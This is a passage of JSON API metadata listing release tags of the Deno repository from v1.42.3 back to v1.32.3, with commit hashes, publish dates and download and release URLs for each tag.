pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/de